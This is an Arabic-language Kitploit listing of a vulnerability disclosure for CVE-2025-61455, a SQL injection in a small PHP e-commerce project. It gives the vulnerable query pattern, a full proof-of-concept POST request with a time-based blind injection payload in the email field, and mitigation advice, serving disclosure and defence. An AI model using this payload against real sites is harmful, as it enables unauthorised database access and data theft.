Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61455 — الإفصاح العام وإثبات المفهوم لـ CVE-2025-61455، وهي ثغرة حقن SQL حرجة في مشروع التجارة الإلكترونية الإصدار 1.0، بما في ذلك التفاصيل الفنية وإثبات المفهوم (PoC) وتوصيات التخفيف. | Kitploit
أدوات/GitHubGitHub/tansique-17/cve-2025-61455
تحليل الثغرات الأمنيةالاستغلالأمن الويبالتعلم والتعليمموارد منسقة
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

الإفصاح العام وإثبات المفهوم لـ CVE-2025-61455، وهي ثغرة حقن SQL حرجة في مشروع التجارة الإلكترونية الإصدار 1.0، بما في ذلك التفاصيل الفنية وإثبات المفهوم (PoC) وتوصيات التخفيف.

عرض المستودع
1منذ 11 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ إفصاح عن ثغرة CVE-2025-61455 — حقن SQL في مشروع التجارة الإلكترونية

تاريخ الإفصاح: 14 أكتوبر 2025
معرف CVE: CVE-2025-61455
الخطورة: حرجة (CVSS 9.8)


🧩 الملخص

توجد ثغرة حرجة من نوع حقن SQL في E-commerce Project v1.0، وتحديدًا في نقطة النهاية signup.inc.php. يقوم التطبيق بإدراج مدخلات المستخدم غير المنقّاة مباشرةً في استعلامات SQL، مما يسمح للمهاجمين غير المصادق عليهم بتجاوز المصادقة وتنفيذ أوامر SQL عشوائية.

تم تخصيص المعرّف CVE-2025-61455 لهذه المشكلة. في وقت الإفصاح العام، لم يتوفر أي تصحيح رسمي.


📦 المنتج المتأثر

  • البائع: مستقل (Bhabishya-123)
  • المشروع: E-commerce
  • الإصدار: v1.0
  • الملف: signup.inc.php
  • نقطة النهاية المعرضة للخطر:
    https://localhost/e-commerce-main/includes/signup.inc.php

🔬 تفاصيل الثغرة

يستخدم التطبيق مدخلات غير منقّاة مباشرةً في استعلامات SQL دون أي تحقق من صحة المدخلات أو استخدام عبارات مُعدّة مسبقًا. توجد الثغرة في معامل aid داخل ملف signup.inc.php.

يمكن للمهاجم حقن كود SQL خبيث عبر معامل البريد الإلكتروني، مما يتيح هجمات حقن SQL العمياء القائمة على الوقت.

مثال على نمط الكود المعرض للخطر:

root@kitploit:~
$query = "SELECT * FROM table WHERE email='$email'";

يسمح هذا بحمولات حقن يمكنها التلاعب بمنطق الاستعلام واستخراج بيانات حساسة.


📌 تصنيف CWE

معرف CWEالعنوان
CWE-89تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL

📊 درجة CVSS v3.1

الدرجةالخطورةسلسلة المتجهات
9.8حرجةCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

💥 الأثر

قد يؤدي الاستغلال الناجح إلى:

  • ✅ تجاوز كامل للمصادقة
  • 🔓 وصول غير مصرح به إلى الميزات المميزة
  • 📊 سرقة البيانات عبر حقن SQL الأعمى القائم على الوقت
  • 🛠️ احتمال التلاعب بالبيانات أو حذفها
  • ⚠️ اختراق كامل لقاعدة البيانات الخلفية
  • 💻 احتمال تنفيذ كود عن بُعد

🧪 إثبات المفهوم (PoC)

1. استنساخ المستودع

root@kitploit:~
git clone https://github.com/Bhabishya-123/E-commerce.git

2. الاستضافة محليًا

استخدم XAMPP/LAMP لنشر المشروع وانتقل إلى:

root@kitploit:~
http://localhost/e-commerce-main/includes/signup.inc.php

3. حقن الحمولة

أرسل طلب HTTP الخبيث التالي:

root@kitploit:~
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=

التفسير:
يحتوي معامل البريد الإلكتروني على حمولة حقن SQL قائمة على الوقت: '+(select*from(select(sleep(20)))a)+'

إذا تأخر التطبيق لمدة 20 ثانية قبل الاستجابة، فإن حقن SQL يكون ناجحًا.


🔐 التوصيات

  • ✅ استبدال استعلامات SQL الديناميكية بـعبارات مُعدّة مسبقًا (mysqli_prepare() أو PDO).
  • 🔍 إجراء التحقق من صحة المدخلات وتنقيتها لجميع مدخلات المستخدم.
  • 🧱 نشر جدار حماية لتطبيقات الويب (WAF) لحظر أنماط حقن SQL المعروفة.
  • 🛡️ إجراء مراجعات منتظمة للكود واختبارات الاختراق للاكتشاف المبكر.
  • 🔒 تنفيذ استعلامات ذات معاملات مُعلمة لجميع التفاعلات مع قاعدة البيانات.
  • 📝 استخدام قوائم السماح للتحقق من صحة المدخلات حيثما أمكن.

📆 الجدول الزمني

الحدثالتاريخ
اكتشاف الثغرة16 سبتمبر 2025
الإفصاح العام13 أكتوبر 2025
التصحيح المتاح❌ غير متاح وقت الإفصاح

🙋‍♂️ الاعتمادات

تم اكتشاف هذه الثغرة والإفصاح عنها بمسؤولية بواسطة:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 المراجع

  • OWASP - حقن SQL
  • PortSwigger - حقن SQL
  • CVE-2025-61455 على CVE.org

💬 تم نشر هذا التقرير بشكل مستقل بسبب عدم استجابة البائع.

تنزيل الأداة